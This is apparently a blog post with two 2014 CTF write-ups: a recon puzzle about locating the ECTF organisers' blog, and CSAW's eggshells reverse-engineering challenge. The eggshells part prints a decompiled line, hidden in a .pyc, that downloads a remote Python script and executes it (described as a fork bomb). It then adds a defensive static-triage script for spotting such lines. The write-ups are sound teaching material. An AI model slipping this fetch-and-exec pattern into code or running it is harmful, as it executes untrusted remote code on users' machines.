Meet The Team – Ectf 2014 Recon-80

Screenshot from 2014-10-23 16:17:29

I have attached the screenshot of the Recon-80 question 🙂

The question is very simple, but finding the team's blog is hard because ECTF is being organised for the first time.

The ECTF organizers don't have a good blog containing all the write-ups they have solved. It seems they created the blog just for this challenge, as it contains only one post, which makes it difficult for search engines to find the link (if you googled for the blog and did not get the link, don't blame Google, as it is doing a great job).

The name of the team organising the CTF is NIA (no internet access). They mention it in the clue as well, but you would never guess that it is the name of the team. For more details, visit this link: http://nia-ctf.github.io/

Bingo: you find the blog link on ctftime.org at this address, https://ctftime.org/team/8096, which gives you the link http://nia-ctf.github.io/, so you have the flag. There was some small confusion regarding the format of the flag, but the admin would have helped you at that time 🙂

flag:http://nia-ctf.github.io/

CSAW CTF Quals 2014 – eggshells (100) writeup

Here is the link to the zip file and the question: http://shell-storm.org/repo/CTF/CSAW-2014/Reverse_Engineering/eggshells-100/

The question is :

I trust people on the internet all the time, do you?

Written by ColdHeat

The question doesn't give you any kind of hint when you first try to solve it, but when you finally see the result it makes some sense 🙂

First, when you unzip the file you get two directories named “eggshells-master” and “__MACOSX”. Here are screenshots of the contents of both folders.

Screenshot from 2014-10-07 19:09:00

Screenshot from 2014-10-07 20:50:32

Source code is present for all the files except utilys.pyc, which is a compiled Python file. You can decompile it using this application (https://sourceforge.net/projects/easypythondecompiler/), which is based on uncompyle2 (https://github.com/Mysterie/uncompyle2), or whatever else can decompile a Python 2.7 file 🙂

If you decompile the file, here is the code that you get:

[code language="python"]
# Decompiled utilys.pyc (Python 2.7): downloads a remote script and executes it
exec __import__('urllib2').urlopen('http://kchung.co/lol.py').read()
[/code]

Don't be in a hurry to run this code, as it is a fork bomb 🙂

Screenshot from 2014-10-07 21:50:31

Here you get the flag: flag{trust_is_risky}

Now you get why the question is like that 🙂
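
Decompiling is one way to read a .pyc without running it. As an added example (not part of the original write-up or the challenge files), the Python 3 code below loads a .pyc's code object with `marshal` and reports dynamic-execution names, network names and URL constants. It assumes the .pyc was built by the same CPython 3.7+ that runs the script, so the challenge's Python 2.7 file would be rejected by the magic check; the watch lists, function names and sample URL are constructed for illustration.

```python
import importlib.util
import marshal
import re
import types

# Assumed watch lists for this example; extend them for your environment.
DYNAMIC = {"exec", "eval", "compile", "__import__"}
NETWORK = {"urlopen", "urlretrieve", "urllib", "urllib2", "requests", "socket"}
URL_RE = re.compile(r"https?://[^\s'\"]+")

def load_pyc(data):
    """Return the code object stored in .pyc bytes without executing it."""
    if data[:4] != importlib.util.MAGIC_NUMBER:
        raise ValueError("pyc was built by a different Python version")
    # CPython 3.7+ header is 16 bytes. marshal.loads does not run the code,
    # but it is not hardened against malformed input: use a throwaway VM.
    return marshal.loads(data[16:])

def walk(code):
    """Yield `code` and every code object nested in its constants."""
    yield code
    for const in code.co_consts:
        if isinstance(const, types.CodeType):
            yield from walk(const)

def triage(code):
    """Report dynamic-execution names, network names and URL constants."""
    seen, urls = set(), set()
    for obj in walk(code):
        seen.update(obj.co_names)
        for const in obj.co_consts:
            if isinstance(const, str):
                seen.add(const)  # e.g. a module name passed to __import__
                urls.update(URL_RE.findall(const))
    dynamic, network = seen & DYNAMIC, seen & NETWORK
    return {"dynamic": sorted(dynamic), "network": sorted(network),
            "urls": sorted(urls),
            "suspicious": bool(dynamic and (network or urls))}

def make_pyc(source):
    """Build constructed .pyc bytes; compile() only parses, nothing runs."""
    code = compile(source, "<constructed>", "exec")
    return importlib.util.MAGIC_NUMBER + bytes(12) + marshal.dumps(code)

# Constructed sample shaped like the decompiled line, with a placeholder host.
SAMPLE = make_pyc(
    "exec(__import__('urllib2').urlopen('http://example.invalid/p.py').read())")

if __name__ == "__main__":
    print(triage(load_pyc(SAMPLE)))
```

A "suspicious" result only means the file combines dynamic execution with a network reference; read the decompiled source before drawing a conclusion.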